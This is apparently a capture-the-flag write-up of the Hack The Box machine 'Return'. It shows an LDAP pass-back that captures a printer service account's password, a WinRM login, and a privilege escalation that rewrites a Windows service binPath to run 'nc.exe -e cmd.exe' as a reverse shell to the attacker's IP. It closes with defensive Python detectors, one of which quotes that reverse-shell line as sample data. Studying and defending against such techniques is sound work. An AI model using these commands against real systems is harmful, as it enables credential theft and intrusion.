![](https://imgur.com/twDnGyV.png)

### Enumeration

```
╭─tahaafarooq at urchinsec in ~/Desktop/hackthebox/machines/return
╰─○ nmap -A 10.129.95.241 -oN nmap-scan
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-07 12:24 EAT
Nmap scan report for 10.129.95.241
Host is up (0.16s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE      VERSION
53/tcp    open     domain?
80/tcp    open     http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-07 09:44:18Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49154/tcp filtered unknown
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-12-07T09:46:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.67 seconds
```

We have multiple ports open. Port 80 is serving what looks like a printer admin panel, SMB is open, and so is LDAP, so this is a really interesting box :+1:

### Foothold

First thing I do is visit port 80:

![](https://imgur.com/kiChdAt.png)

I visited the Settings page at `http://return.htb/settings.php` and found a subdomain there: `http://printer.return.local`, so I add that to my `/etc/hosts` file.

![](https://imgur.com/Bi9Reg5.png)

We also get `svc-printer` as a username! The printer's configuration page lets a user set the LDAP/AD server it queries for the user list and passwords, so what if I start a listener on port 389 (LDAP), change the server address in the settings to my own machine and see what happens...:

![](https://imgur.com/gR9YIZ1.png)

```
╰─○ sudo nc -lvnp 389
Listening on 0.0.0.0 389
Connection received on 10.129.95.241 49570
0*`%return\svc-printer� 1edFg43012!!
```

The printer sent a plaintext LDAP bind carrying the service account's password, so I got `1edFg43012!!`. Now I just use my sweet `evil-winrm` to try to get a shell with the creds I got:

```
╰─○ evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
```

### Privilege Escalation

```
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
```

Not much, but useful. I decided to check which groups I was in, hoping for Administrators, but it turned out differently:

```
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.
```

So `svc-printer` is a member of Server Operators: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

Members of this group can start and stop services, so I understood it would be easy to get a quick reverse shell as `NT Authority\system`. I first set up a reverse shell listener on port 1234, and then I abuse the `vss` service with `sc.exe`, the Windows service-control tool (roughly the equivalent of `systemctl` on Linux). But first things first, upload netcat:

```
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload nc.exe
Info: Uploading nc.exe to C:\Users\svc-printer\Documents\nc.exe

Data: 51488 bytes of 51488 bytes copied

Info: Upload successful!
```

And now the good part: misconfiguring the service that is about to run:

```
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.15 1234"
[SC] ChangeServiceConfig SUCCESS
```

We stop the service if it's running with `sc.exe stop vss`, and then start it again, which executes our netcat reverse shell:

![](https://imgur.com/SFc35WI.png)

And now we have Administrator-level access! The `user.txt` flag is on the Desktop of `svc-printer`, and `root.txt` is on the Desktop of `Administrator`.

![](https://c.tenor.com/qMER41oNWx8AAAAC/youve-been-hacked-gregory-brown.gif)
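The LDAP pass-back in the Foothold section works because the printer performs an LDAPv3 simple bind over plain TCP/389, so the password crosses the wire in the clear. As an added example (not part of the original writeup), here is a small BER decoder a network sensor could use to flag such binds; the account name and password in the constructed sample are placeholders, and the decoder reports only the secret's length, never the secret.

```python
# Added example, not part of the original writeup: a minimal BER decoder for an
# LDAPv3 BindRequest (RFC 4511) that flags simple binds seen on unencrypted
# TCP/389. The secret itself is never returned, only its length.

def ber_encode(tag: int, value: bytes) -> bytes:
    """Encode one short-form BER element (value shorter than 128 bytes)."""
    assert len(value) < 128
    return bytes([tag, len(value)]) + value

def ber_read(buf: bytes, pos: int):
    """Decode one BER element at pos; returns (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def classify_bind(packet: bytes) -> dict:
    """Describe the BindRequest inside an LDAPMessage without exposing the credential."""
    tag, msg, _ = ber_read(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, msg_id, pos = ber_read(msg, 0)             # INTEGER messageID
    op_tag, bind, _ = ber_read(msg, pos)
    info = {"message_id": int.from_bytes(msg_id, "big")}
    if op_tag != 0x60:                            # [APPLICATION 0] = BindRequest
        return {**info, "op": "not-bind"}
    _, version, pos = ber_read(bind, 0)           # INTEGER version
    _, name, pos = ber_read(bind, pos)            # OCTET STRING name (DN or DOMAIN\user)
    auth_tag, cred, _ = ber_read(bind, pos)       # [0] simple or [3] sasl
    info.update(op="bind", version=version[0], name=name.decode("utf-8", "replace"))
    if auth_tag == 0x80:
        info.update(auth="simple", secret_len=len(cred),
                    alert="cleartext simple bind: password exposed on the wire")
    elif auth_tag == 0xA3:                        # SaslCredentials { mechanism, credentials }
        _, mech, _ = ber_read(cred, 0)
        info.update(auth="sasl/" + mech.decode(), alert=None)
    else:
        info.update(auth=f"unknown-tag-0x{auth_tag:02x}", alert=None)
    return info

# Constructed sample: the shape of packet a device emits when its LDAP server
# setting points at a plain TCP/389 listener. Account and password are placeholders.
SAMPLE_SIMPLE_BIND = ber_encode(0x30,
    ber_encode(0x02, b"\x01")                                       # messageID 1
    + ber_encode(0x60, ber_encode(0x02, b"\x03")                    # BindRequest, LDAPv3
                       + ber_encode(0x04, b"EXAMPLE\\svc-account")  # name
                       + ber_encode(0x80, b"S3cret-placeholder")))  # simple authentication
```

The fix on the server side is to require signing or LDAPS and to not let the device configuration page be changed by anyone who can reach it.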
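The privilege escalation step rewrites the `vss` service's ImagePath (what `sc.exe config ... binPath=` sets) to an executable in a user-writable directory. As an added example, not from the original writeup, here is a detector over constructed, simplified Sysmon Event ID 13 (RegistryEvent SetValue) records that flags any service ImagePath written outside trusted system directories; the field names follow Sysmon, but the records and the trusted-root list are constructed for this illustration.

```python
# Added example, not part of the original writeup: flag writes to a service's
# ImagePath (what `sc.exe config <svc> binPath=` changes) that point outside
# trusted system directories. Input is constructed, simplified Sysmon Event ID 13
# (RegistryEvent SetValue) records flattened to "Key=value" lines.
import re

# Lower-cased prefixes an ordinary user cannot write to; anything else is suspect.
TRUSTED_ROOTS = ("c:\\windows\\", "%systemroot%\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
IMAGEPATH_RE = re.compile(r"\\services\\(?P<svc>[^\\]+)\\imagepath$", re.I)

def parse_record(line: str) -> dict:
    """Split a 'Key=value Key=value' record; values may contain spaces."""
    return dict(re.findall(r"(\w+)=(.*?)(?= \w+=|$)", line))

def service_image(details: str) -> str:
    """Return the executable part of an ImagePath value, dropping arguments."""
    m = re.match(r'^"([^"]+)"|^(.*?\.exe)', details, re.I)
    return (m.group(1) or m.group(2)) if m else details

def flag_imagepath_changes(lines):
    """Return one finding per ImagePath write whose executable is outside TRUSTED_ROOTS."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("EventID") != "13":
            continue
        m = IMAGEPATH_RE.search(rec.get("TargetObject", ""))
        if not m:
            continue
        exe = service_image(rec.get("Details", ""))
        if not exe.lower().startswith(TRUSTED_ROOTS):
            findings.append({"service": m.group("svc"), "image": exe})
    return findings

# Constructed records. The Service Control Manager (services.exe) performs the
# registry write on the caller's behalf, so the Image field looks the same for
# benign and malicious changes; the new path is the signal.
SAMPLE_EVENTS = [
    r"EventID=13 EventType=SetValue Image=C:\Windows\System32\services.exe "
    r"TargetObject=HKLM\System\CurrentControlSet\Services\VSS\ImagePath "
    r"Details=%SystemRoot%\System32\vssvc.exe",
    r"EventID=13 EventType=SetValue Image=C:\Windows\System32\services.exe "
    r"TargetObject=HKLM\System\CurrentControlSet\Services\VSS\ImagePath "
    r"Details=C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.15 1234",
    r"EventID=13 EventType=SetValue Image=C:\Windows\explorer.exe "
    r"TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater "
    r"Details=C:\Users\svc-printer\updater.exe",
]

if __name__ == "__main__":
    print(flag_imagepath_changes(SAMPLE_EVENTS))
```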